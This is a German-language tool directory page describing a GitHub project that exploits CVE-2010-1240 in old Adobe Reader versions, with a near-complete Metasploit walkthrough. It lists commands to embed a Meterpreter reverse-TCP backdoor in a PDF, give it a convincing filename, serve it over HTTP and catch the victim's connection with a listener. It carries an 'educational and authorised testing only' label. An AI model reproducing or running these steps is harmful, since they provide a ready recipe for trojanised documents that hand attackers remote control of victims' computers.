Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2010-1240 — Metasploit-basiertes Tool zum Einbetten von PDF-Backdoors, das CVE-2010-1240 ausnutzt, um Meterpreter-Payloads mittels Social Engineering für autorisierte Penetrationstests zu liefern. | Kitploit
Tools/GitHubGitHub/asepsaepdin/cve-2010-1240
Phishing-ToolsExploit-FrameworksWebanwendungs-ExploitationPenetrationstestsSocial EngineeringPayload-Entwicklung
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Metasploit-basiertes Tool zum Einbetten von PDF-Backdoors, das CVE-2010-1240 ausnutzt, um Meterpreter-Payloads mittels Social Engineering für autorisierte Penetrationstests zu liefern.

Repository anzeigen
11vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2010-1240 – Einbetten einer Hintertür in eine PDF

Python


⚠️ Nur für Bildungszwecke und autorisierte Sicherheitsforschung

Beschreibung

Adobe Reader und Acrobat 9.x vor 9.3.3 sowie 8.x vor 8.2.3 unter Windows und Mac OS X schränken den Inhalt eines Textfeldes im Warnhinweis „Datei öffnen“ nicht ein, was es Angreifern erleichtert, Benutzer dazu zu verleiten, ein beliebiges lokales Programm auszuführen, das in einem PDF-Dokument angegeben wurde – demonstriert durch ein Textfeld, das behauptet, der Öffnen-Button erlaube das Lesen einer verschlüsselten Nachricht.

Demo

Animation

Schritt-für-Schritt-Anleitung

  1. Starte zuerst msfconsole

    root@kitploit:~
    msfconsole
    
  2. Setze dann den Payload für das Einbetten in die PDF

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. Setze die Option INFILENAME und gib den direkten Pfad zur Original-PDF-Datei an

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. Lege einen überzeugenderen Namen für die neu erstellte schadhafte PDF-Datei fest, indem du die Option FILENAME setzt

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. Suche und bette den Payload in die PDF-Datei ein

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. Setze die Option LHOST auf die IP des Angreifers

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. Öffne ein neues Terminal und navigiere zum Speicherort der schadhaften PDF-Datei

    root@kitploit:~
    cd .msf4/local/
    
  8. Erstelle einen temporären Server in Python

    root@kitploit:~
    python -m http.server
    
  9. Lade die schadhafte PDF-Datei auf dem Zielrechner herunter

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  10. Bevor die schadhafte PDF-Datei auf dem Zielrechner ausgeführt wird, starte den Listener im vorherigen Terminal

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. Sobald die schadhafte PDF-Datei auf dem Zielrechner ausgeführt wird, erhältst du eine Verbindung zum Zielrechner

Quellen

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
Tool herunterladen